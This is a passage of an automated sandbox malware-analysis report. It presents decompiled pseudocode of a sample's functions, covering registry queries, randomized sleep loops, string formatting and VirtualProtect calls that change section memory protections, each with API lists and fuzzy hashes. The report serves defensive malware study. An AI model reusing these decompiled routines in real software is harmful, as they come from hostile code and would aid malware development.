					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E006D7A71(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E006D789E(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E006D2B8C(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                            0x006d78bf
                            0x006d78e2
                            0x006d78ec
                            0x006d78f2
                            0x006d78f6
                            0x006d790e
                            0x006d7913
                            0x006d795b
                            0x006d7915
                            0x006d791d
                            0x006d7921
                            0x006d7958
                            0x006d7923
                            0x006d7935
                            0x006d7939
                            0x006d794f
                            0x006d793b
                            0x006d793e
                            0x006d7940
                            0x006d7945
                            0x006d794a
                            0x006d794a
                            0x006d7945
                            0x006d7939
                            0x006d7921
                            0x006d7963
                            0x006d7963
                            0x006d796a
                            0x006d7970
                            0x006d7970
                            0x006d78d8
                            0x006d78dc
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • RegOpenKeyW.ADVAPI32(80000002,014A9F02,014A9F02), ref: 006D78EC
                            • RegQueryValueExW.KERNELBASE(014A9F02,?,00000000,80000002,00000000,00000000,?,006D2410,3D006D90,80000002,006D68B1,00000000,006D68B1,?,014A9F02,80000002), ref: 006D790E
                            • RegQueryValueExW.ADVAPI32(014A9F02,?,00000000,80000002,00000000,00000000,00000000,?,006D2410,3D006D90,80000002,006D68B1,00000000,006D68B1,?,014A9F02), ref: 006D7933
                            • RegCloseKey.KERNELBASE(014A9F02,?,006D2410,3D006D90,80000002,006D68B1,00000000,006D68B1,?,014A9F02,80000002,00000000,?), ref: 006D7963
                              • Part of subcall function 006D2B8C: SafeArrayDestroy.OLEAUT32(00000000), ref: 006D2C14
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                            • String ID:
                            • API String ID: 486277218-0
                            • Opcode ID: 6a0b356b85acf9daffea26d8b6504a04de464d1cf39ec5ceb4ae23302130d49c
                            • Instruction ID: b368475694816eea2f8ccbd26dd5945c8edaba05956a54163aac1997234f70c0
                            • Opcode Fuzzy Hash: 6a0b356b85acf9daffea26d8b6504a04de464d1cf39ec5ceb4ae23302130d49c
                            • Instruction Fuzzy Hash: 1A21FC7390411EAFCF119F94DC80CEE7BAAEB04350B14852AFE159A320E6319E61ABD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2CEC Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 65%
                            			E006D2CEC(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L006D8406();
					_t34 = _t16 + _t13;
					_t17 = E006D4D24(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                            0x006d2cf1
                            0x006d2cfc
                            0x006d2cfd
                            0x006d2cfd
                            0x006d2d09
                            0x006d2d12
                            0x006d2d15
                            0x006d2d19
                            0x006d2d1b
                            0x006d2d20
                            0x006d2d21
                            0x006d2d22
                            0x006d2d2c
                            0x006d2d2f
                            0x006d2d36
                            0x006d2d3a
                            0x006d2d41
                            0x006d2d47
                            0x006d2d51

                            APIs
                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,006D72FE,?,?), ref: 006D2CFD
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,006D72FE,?,?), ref: 006D2D09
                            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 006D2D22
                              • Part of subcall function 006D4D24: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 006D4DC3
                            • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,006D72FE,?,?), ref: 006D2D41
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                            • String ID:
                            • API String ID: 1610602887-0
                            • Opcode ID: 2c1ac58b403eb4e4fad1df6ade3967425556f73f68294ee03fb79d41d4678a17
                            • Instruction ID: 15380382b0f2cf4d1eef1489c3e667680fc69e2586011adad82b3932aa22b663
                            • Opcode Fuzzy Hash: 2c1ac58b403eb4e4fad1df6ade3967425556f73f68294ee03fb79d41d4678a17
                            • Instruction Fuzzy Hash: 4AF0A477E402047BD7149BA4DC5EFDF77BADB84361F100129F602E7340E9B49A0186A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D3D80 Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E006D3D80(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x6da3cc; // 0x14a9600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x6da3cc; // 0x14a9600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x6da030) {
					HeapFree( *0x6da2d8, 0, _t8);
				}
				_t9 = E006D4076(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x6da3cc; // 0x14a9600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                            0x006d3d80
                            0x006d3d80
                            0x006d3d89
                            0x006d3d99
                            0x006d3d99
                            0x006d3d9e
                            0x006d3da3
                            0x00000000
                            0x00000000
                            0x006d3d93
                            0x006d3d93
                            0x006d3da5
                            0x006d3da9
                            0x006d3dbb
                            0x006d3dbb
                            0x006d3dc6
                            0x006d3dcb
                            0x006d3dce
                            0x006d3dd3
                            0x006d3dd7
                            0x006d3ddd

                            APIs
                            • RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D3D89
                            • Sleep.KERNEL32(0000000A), ref: 006D3D93
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D3DBB
                            • RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D3DD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: e13d2c80b1d65ca428d89af5677de4e934151f4e43aca19a4e52a56241df4e9b
                            • Instruction ID: 0c5a5ea1ef70f7daeeb105798524513e1e39c5a1fdc6ff10f6423e1953ca1ac4
                            • Opcode Fuzzy Hash: e13d2c80b1d65ca428d89af5677de4e934151f4e43aca19a4e52a56241df4e9b
                            • Instruction Fuzzy Hash: 0EF0F870E06261ABDB24AFA9EC48F563BA7AF54340B04A41BF546D63B1C730DD40DB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D61FE Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D61FE(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E006D1CE6(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x6da348; // 0xdcd5a8
				_t4 = _t24 + 0x6dbe30; // 0x14a93d8
				_t5 = _t24 + 0x6dbdd8; // 0x4f0053
				_t26 = E006D3A53( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x6da348; // 0xdcd5a8
						_t11 = _t32 + 0x6dbe24; // 0x14a93cc
						_t48 = _t11;
						_t12 = _t32 + 0x6dbdd8; // 0x4f0053
						_t52 = E006D262D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x6da348; // 0xdcd5a8
							_t13 = _t35 + 0x6dbe6e; // 0x30314549
							if(E006D3969(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x6da2fc - 6;
								if( *0x6da2fc <= 6) {
									_t42 =  *0x6da348; // 0xdcd5a8
									_t15 = _t42 + 0x6dbdba; // 0x52384549
									E006D3969(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x6da348; // 0xdcd5a8
							_t17 = _t38 + 0x6dbe68; // 0x14a9410
							_t18 = _t38 + 0x6dbe40; // 0x680043
							_t45 = E006D187F(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x6da2d8, 0, _t52);
						}
					}
					HeapFree( *0x6da2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E006D1544(_t54);
				}
				return _t45;
			}


















                            0x006d61fe
                            0x006d620e
                            0x006d6211
                            0x006d6218
                            0x006d621a
                            0x006d621a
                            0x006d621d
                            0x006d6222
                            0x006d6229
                            0x006d6236
                            0x006d623b
                            0x006d623f
                            0x006d624d
                            0x006d625b
                            0x006d625f
                            0x006d62f0
                            0x006d62f0
                            0x006d6265
                            0x006d6265
                            0x006d626a
                            0x006d626a
                            0x006d6271
                            0x006d627d
                            0x006d627f
                            0x006d6281
                            0x006d6283
                            0x006d628a
                            0x006d629c
                            0x006d629e
                            0x006d62a5
                            0x006d62a7
                            0x006d62ae
                            0x006d62b9
                            0x006d62b9
                            0x006d62a5
                            0x006d62be
                            0x006d62c3
                            0x006d62ca
                            0x006d62e8
                            0x006d62ea
                            0x006d62ea
                            0x006d6281
                            0x006d62fc
                            0x006d62fc
                            0x006d62fe
                            0x006d6303
                            0x006d6305
                            0x006d6305
                            0x006d6310

                            APIs
                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,014A93D8,00000000,?,74D0F710,00000000,74D0F730), ref: 006D624D
                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,014A9410,?,00000000,30314549,00000014,004F0053,014A93CC), ref: 006D62EA
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,006D521B), ref: 006D62FC
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 0c09c794eeb08ea03ce97376907f7be46c956164074f19fb9ccf163f45b671a1
                            • Instruction ID: 1eaea73be50203a3f2bd5694cf7d59aa08e36d0230f97c1150c1ed9f341f8ed4
                            • Opcode Fuzzy Hash: 0c09c794eeb08ea03ce97376907f7be46c956164074f19fb9ccf163f45b671a1
                            • Instruction Fuzzy Hash: 2A318932D01208ABCB119BD5DC45EEA3BBBEB48700F1510ABF601A7261D6B19A04DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D64A2 Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E006D64A2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x6da348; // 0xdcd5a8
				_t2 = _t22 + 0x6db67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x6da2ec >= 5) {
					_t30 = E006D3643(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x6da2ec =  *0x6da2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E006D7194(_t50, _t49); // executed
					_t34 = E006D1EDF(_t49, _t50); // executed
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x6da2ec < 5) {
							 *0x6da2ec =  *0x6da2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E006D14C6();
					HeapFree( *0x6da2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x6da3e0; // 0x14a9be8
				if(RtlAllocateHeap( *0x6da2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E006D6CA4(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}















                            0x006d64a9
                            0x006d64b0
                            0x006d64b4
                            0x006d64b9
                            0x006d64c4
                            0x006d64d4
                            0x006d6523
                            0x006d6528
                            0x006d6528
                            0x006d652b
                            0x006d652f
                            0x006d6569
                            0x006d6569
                            0x006d656f
                            0x006d6576
                            0x006d6576
                            0x006d6531
                            0x006d6534
                            0x006d6536
                            0x006d6543
                            0x006d6545
                            0x006d654c
                            0x006d6583
                            0x006d6588
                            0x006d658a
                            0x006d658c
                            0x006d658c
                            0x00000000
                            0x006d658a
                            0x006d654e
                            0x006d6555
                            0x006d6563
                            0x00000000
                            0x006d6563
                            0x006d64d6
                            0x006d64f1
                            0x006d650b
                            0x00000000
                            0x006d650b
                            0x006d6504
                            0x00000000

                            APIs
                            • wsprintfA.USER32 ref: 006D64C4
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 006D64E9
                              • Part of subcall function 006D6CA4: GetTickCount.KERNEL32 ref: 006D6CBB
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D08
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D25
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D47
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D6E
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D8F
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6DBA
                              • Part of subcall function 006D6CA4: HeapFree.KERNEL32(00000000,?), ref: 006D6DCD
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 006D6563
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: wsprintf$Heap$Free$AllocateCountTick
                            • String ID:
                            • API String ID: 1307794992-0
                            • Opcode ID: 0d839b5035d6f2b89cc856d2e59ce20bd2dc8ec953560ce53c295ab66ea23571
                            • Instruction ID: 06061e1d3f072145b26d08161f6ebae3b2c3c1dbc75064191aecfd936ccf9b98
                            • Opcode Fuzzy Hash: 0d839b5035d6f2b89cc856d2e59ce20bd2dc8ec953560ce53c295ab66ea23571
                            • Instruction Fuzzy Hash: E6313871D01208EBCB01DFA5EC84A9A3BBAFB49354F148027F905E7360D771DA85CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D69D2 Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E006D69D2(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x6da2d8, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E006D7A86(_t57 - _a4, _a4, _t48);
							_t38 = E006D7A86(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E006D7A86(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                            0x006d69da
                            0x006d69dd
                            0x006d69df
                            0x006d69e8
                            0x006d69fa
                            0x006d69fa
                            0x006d69fe
                            0x006d6a00
                            0x006d6a03
                            0x006d6a06
                            0x006d6a0f
                            0x006d6a19
                            0x006d6a1d
                            0x006d6a22
                            0x006d6a32
                            0x006d6a38
                            0x006d6a3c
                            0x006d6a8b
                            0x006d6a3e
                            0x006d6a3e
                            0x006d6a47
                            0x006d6a56
                            0x006d6a5b
                            0x006d6a68
                            0x006d6a71
                            0x006d6a7c
                            0x006d6a83
                            0x006d6a87
                            0x006d6a87
                            0x006d6a3c
                            0x006d6a92
                            0x006d6a99

                            APIs
                            • lstrlen.KERNEL32(74D0F710,?,00000000,?,74D0F710), ref: 006D6A06
                            • StrStrA.SHLWAPI(00000000,?), ref: 006D6A13
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 006D6A32
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 556738718-0
                            • Opcode ID: 86d43d8207cfcf18c1ef7687f857c10560bdff0f1228e7665e050079174eff9b
                            • Instruction ID: 1fcacb111eb3d067a6cb982c0ed18661f741808d93bc93247f5ade6cec9e6196
                            • Opcode Fuzzy Hash: 86d43d8207cfcf18c1ef7687f857c10560bdff0f1228e7665e050079174eff9b
                            • Instruction Fuzzy Hash: 1D214A36A04249AFCB01DF68C884A9EBBB6AF85314F188156FC44AB315D731EA15CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401E3D Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E00401E3D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x403180;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                            0x00401e47
                            0x00401e54
                            0x00401e5a
                            0x00401e66
                            0x00401e76
                            0x00401e78
                            0x00401e80
                            0x00401f15
                            0x00401f1c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401e86
                            0x00401e86
                            0x00401e86
                            0x00401e8a
                            0x00000000
                            0x00000000
                            0x00401e96
                            0x00401e9a
                            0x00401ebe
                            0x00401ec2
                            0x00401ed6
                            0x00401ed6
                            0x00401edc
                            0x00401eeb
                            0x00401eef
                            0x00401ef7
                            0x00401ef7
                            0x00401eff
                            0x00401f02
                            0x00401f0f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401f0f
                            0x00401eca
                            0x00401ece
                            0x00401ed4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401ed4
                            0x00401ea2
                            0x00401ea6
                            0x00401eb0
                            0x00401ea8
                            0x00401ea8
                            0x00401ea8
                            0x00000000
                            0x00401ea6
                            0x00000000

                            APIs
                            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401E76
                            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401EEB
                            • GetLastError.KERNEL32 ref: 00401EF1
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: ProtectVirtual$ErrorLast
                            • String ID:
                            • API String ID: 1469625949-0
                            • Opcode ID: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
                            • Instruction ID: 3241aa71f1d949b352c2025a784480cc2ce18444d2ae61006a318d933437353e
                            • Opcode Fuzzy Hash: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
                            • Instruction Fuzzy Hash: 6521607180020ADFCB14CF95C985EBEF7B4FF48345F11446AD506E7164E3B8AA64CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D4076 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                            Download Yara Rule
                            C-Code - Quality: 47%
                            			E006D4076(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E006D7A71(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x6d9278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                            0x006d407a
                            0x006d4087
                            0x006d4089
                            0x006d408a
                            0x006d4092
                            0x006d4092
                            0x006d4096
                            0x00000000
                            0x00000000
                            0x006d408d
                            0x006d408e
                            0x006d4091
                            0x006d4091
                            0x006d409e
                            0x006d40a3
                            0x006d40a8
                            0x006d40b0
                            0x006d40b6
                            0x006d40b8
                            0x006d40bb
                            0x006d40bf
                            0x006d40c1
                            0x006d40c4
                            0x006d40c4
                            0x006d40c5
                            0x006d40c7
                            0x006d40c4
                            0x006d40d1
                            0x006d40d4
                            0x006d40d7
                            0x006d40d8
                            0x006d40da
                            0x006d40e1
                            0x006d40e1
                            0x006d40ed

                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,014A95FC,?,?,006D3DCB,?,014A95FC), ref: 006D4092
                            • StrTrimA.KERNELBASE(?,006D9278,00000002,?,006D3DCB,?,014A95FC), ref: 006D40B0
                            • StrChrA.SHLWAPI(?,00000020,?,006D3DCB,?,014A95FC), ref: 006D40BB
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
